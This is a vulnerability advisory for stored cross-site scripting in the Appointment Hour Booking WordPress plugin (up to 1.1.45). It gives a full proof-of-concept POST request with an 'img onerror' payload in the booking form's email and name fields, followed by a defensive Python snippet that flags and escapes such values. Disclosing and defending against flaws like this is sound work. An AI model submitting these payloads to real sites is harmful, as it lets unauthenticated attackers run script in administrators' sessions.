wpexploit | Ryan Dewhurst | WPEX-ID:49B6FF20-83C7-4950-AD2F-BA6A7D75C851
Jul 09, 2019 - 12:00 a.m.

Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)


EPSS: 0.001 (percentile: 36.4%)

It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.

POST /booking-form/ HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local/booking-form/
Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283
Content-Length: 1809
Connection: close
Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676
Upgrade-Insecure-Requests: 1

-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_pform_psequence"

_1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_pform_process"

1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_id"

2
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_ref_page"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="form_structure_1"


-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="refpage_1"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1"

2019-07-13 12:00/13:00 0 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_services"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_capacity"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="tcostfieldname1_1"

1.00
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="email_1"

"><img src=x onerror=alert(1)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname2_1"

"><img src=x onerror=alert(2)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"

auvoe
-----------------------------11713224624340267851833710283--
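
For defenders triaging stored bookings or request logs, the following added example (not part of the original advisory or the plugin's code) parses a multipart/form-data body, flags values that are not valid for their field or contain HTML metacharacters, and shows the escaped form that is safe to render in an admin page. The boundary and sample body are constructed, and the `email_<n>` naming rule and the simplified address pattern are assumptions.

```python
import email
import html
import re

# Characters that let a value break out of HTML text or a quoted attribute.
MARKUP = re.compile(r"[<>\"']")
# Simplified address shape (assumption; not the plugin's own validation).
EMAIL = re.compile(r"[^@\s<>\"']+@[^@\s<>\"']+\.[^@\s<>\"']+")

def form_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: value}."""
    head = b"Content-Type: " + content_type.encode() + b"\r\n\r\n"
    msg = email.message_from_bytes(head + body)
    if not msg.is_multipart():          # wrong content type or unparsable body
        return {}
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        fields[name] = part.get_payload(decode=True).decode("utf-8", "replace")
    return fields

def audit(fields: dict) -> list:
    """Return (field, reason, HTML-escaped value) for each suspicious value."""
    findings = []
    for name, value in fields.items():
        # Assumption: e-mail fields are named email_<n>, as in the request above.
        if name.startswith("email_") and not EMAIL.fullmatch(value):
            findings.append((name, "not an e-mail address", html.escape(value)))
        elif MARKUP.search(value):
            findings.append((name, "HTML metacharacters", html.escape(value)))
    return findings

# Constructed sample: four fields from the request above, made-up boundary.
BOUNDARY = "----constructed-boundary"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE = "".join(
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
    for k, v in [
        ("cp_appbooking_id", "2"),
        ("fieldname1_1", "2019-07-13 12:00/13:00 0 1"),
        ("email_1", '"><img src=x onerror=alert(1)><"'),
        ("fieldname2_1", '"><img src=x onerror=alert(2)><"'),
    ]
).encode() + f"--{BOUNDARY}--\r\n".encode()

if __name__ == "__main__":
    for name, reason, escaped in audit(form_fields(CONTENT_TYPE, SAMPLE)):
        print(f"{name}: {reason}; safe to render as {escaped}")
```

Rejecting the value at submission and escaping it at render time are complementary: escaping on output is what stops execution in the admin view even when older malicious rows are already stored.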
